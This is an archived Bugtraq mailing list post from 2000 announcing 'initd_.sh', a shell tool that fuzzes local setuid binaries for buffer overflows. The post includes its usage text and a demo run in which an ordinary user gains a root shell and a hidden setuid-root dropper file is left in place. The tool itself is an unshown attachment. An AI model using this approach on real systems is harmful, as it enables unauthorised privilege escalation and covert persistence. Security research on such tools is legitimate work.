Home page logo

bugtraq logo Bugtraq mailing list archives

New Tool: initd_.sh;
From: "za () boo ma fu" <initd_ () digital net>
Date: Tue, 5 Sep 2000 01:17:15 -0400

/*** Attachment did not send... resending (sorry for the bulk) ***/
Heyas ;)
    I wrote this tool in the last couple of days to see if I could
actually implement
a program that would automatically attack local binaries and attempt to
find exploits
in respect to buffer overflows via command line switches.
    Despite the script's simplicity I do believe it is a powerful tool
that will aid in securing
any Linux box although I refuse to blindly advertise this as an end all
be all to local
security. As I note in the readme there are numerous discrepancies that
limit the
programs strength, however, _most_ (if not all) of these issues will be
resolved in
upcoming releases of this program.
    Instead of explaining the entire process and capability I'll just
paste the --help
output at the end of this message.  Also I'll paste an example usage for

fun ;D
    This program is a first of its kind as far as I know ;) I'm pretty
excited to see the
response I get from the community.
    Portability to as many operating systems as possible will be
integrated asap,
however it will take a week or two as I am generating the configurable
myself (something I have never done before at this level).
    Anyway, I hope you enjoy this beta release!

    initd_ () digital net
    0x7F Security Research

Restless eyes and erratic blue flicker
While devilish fingers dance and slither
The sound of electricity, relentless, hums....
....When something wicked this way comes
    - initd_'s verse >;)

---- Help Output ----
seychelles.initd_ % ./initd_.sh
 Note: For further explanation on switches consult documentation
 usage: initd_.sh [options]
 -t filename         Define the target binary as 'filename'
 --min_buffer int    Define minimum buffer size as 'int'
 --max_buffer int    Define maximum buffer size as 'int'
 --jmp_buffer int    Define buffer increment value as 'int'
 --min_offset int    Define minimum offset size as 'int'
 --max_offset int    Define maximum offset size as 'int'
 --jmp_offset int    Define offset increment value as 'int'
 --tmp_dir    dir    Force all tmp files to be written to 'dir'
 --rsd_dir    dir    Force the RSD directory to be 'dir'
 --rsdct_dir  dir    Force the RSDCT directory to be 'dir'
 --et_dir     dir    Force the ET directory to be 'dir'
 --uid        int    Force user id of target binary to 'int'
 --gid        int    Force group id of target binary to 'int'
 -n                  Do not query program for command line switches
 -s switches         Pass a quoted string of switches to test
 -q                  Switch messaging to quiet mode
 -v                  Increase program verbocity (3 levels max)
 --help | -h         Display program usage
 Send comments/questions/bugs to: initd_ () digital net
 0x7f Security Research Team: Dangerously Deadicated. . .
--- EOHelp ---
phoenix.initd_ % id
uid=1000(initd_) gid=100(users) groups=100(users)
phoenix.initd_ % ./initd_.sh -t ../../../INITD_2000.08.24/ex
--min_buffer 1024 -v -v -v
 # initd_.sh
 # Automated Exploitation Tool v0.0.3
 # 0x7f Security Research: Something Wicked This Way Comes...
 [+] Target Confirmed
 [+] Binary is not stripped
 [+] Strip has been located. Exploit stealth has increased
 [+] Confirmed temp directory
 [+] RSD Directory confirmed
 [+] Configuring for a Linux system on a i586 chip
 [ ] Owner of target is root
 [ ] Group name of target is root
 [+] User id # determined to be 0
 [+] Group id number determined to be 0
 [ ] Creating the Root Shell Dropper
 [+] RSD Creation Successful
 [ ] Creating Root Shell Dropper Configuration Tool
 [+] RSDCT Creation Successful
 [ ] Creating Exploitation Tool
 [+] ET Creation Succeeded
 [ ] Current Switch: -s
 [ ] Current Buffer Size: 1024
 [ ] Current Offset: -100
 [ ] Current Offset: 0
 [ ] Current Offset: 100
 [ ] Current Offset: 200
 [ ] Current Offset: 300
 [ ] Current Offset: 400
 [+] Executing Cleanup
 [+] Cleanup Complete
 [ ] Welcome to the Dark Side
sh-2.02# id
uid=0(root) gid=0(root) groups=100(users)
sh-2.02# exit
phoenix.initd_ % ls -la
total 38
drwxr-xr-x   2 initd_   users        1024 Sep  5 01:05 .
drwxr-xr-x   4 initd_   users        1024 Sep  5 00:31 ..
-rwsr-sr-x   1 root     root         3192 Sep  5 01:05 .bash_log1n
-rw-r--r--   1 initd_   users        9863 Sep  5 00:30 Readme
-rwxr-xr-x   1 initd_   users       21313 Sep  5 00:22 initd_.sh
phoenix.initd_ %

Enjoy ;)

Attachment: initd_.tar.gz

  By Date           By Thread  

Current thread:
  • New Tool: initd_.sh; za () boo ma fu (Sep 05)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]